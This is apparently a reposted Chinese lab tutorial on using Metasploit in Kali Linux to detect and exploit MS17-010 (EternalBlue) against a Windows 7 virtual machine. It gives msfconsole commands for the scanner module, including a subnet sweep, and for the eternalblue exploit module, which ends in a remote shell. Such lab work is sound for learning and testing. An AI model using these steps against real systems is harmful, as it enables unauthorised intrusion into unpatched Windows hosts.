使用metasploit 检测MS17-010及利用

    Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击(也通常用于回溯分析)。

    此次采用kali Linux系统集成的metasploit进行测试验证MS17-010(永恒之蓝,著名比特币勒索漏洞)。实验环境采用虚拟机,kali 测试机,windows 7 x64 测试靶机。


一、使用scanner下扫描模块扫描是否存在漏洞。

①启用msf之前需要启用postgres服务

②msfconsole //启用msf

使用metasploit 检测MS17-010及利用_第1张图片

③search smb_ms17_010  //使用search 查找ms17_010利用工具目录

使用metasploit 检测MS17-010及利用_第2张图片

④use auxiliary/scanner/smb/smb_ms17_010  //调用scanner smb_ms17_010模块进行扫描

并使用show options查看设置参数

使用metasploit 检测MS17-010及利用_第3张图片

⑥set RHOSTS 192.168.198.136  //设置扫描地址(可设置扫描段 eg: set RHOSTS 192.168.198.0/24)

设置好之后,使用show options查看配置信息,并使用exploit进行测试(利用测试,显示绿色的+,以及提示信息,即为存在漏洞主机)。

使用metasploit 检测MS17-010及利用_第4张图片

二、使用exploit下利用模块进行漏洞攻击。

①use exploit/windows/smb/ms17_010_eternalblue  //调用exploit下的ms17_010_eternalblue模块

使用show options查看参数设置

使用metasploit 检测MS17-010及利用_第5张图片

③set RHOST 192.168.198.136   //设置目标靶机

并使用exploit调用漏洞测试,成功拿到目标shell

使用metasploit 检测MS17-010及利用_第6张图片

你可能感兴趣的:(使用metasploit 检测MS17-010及利用)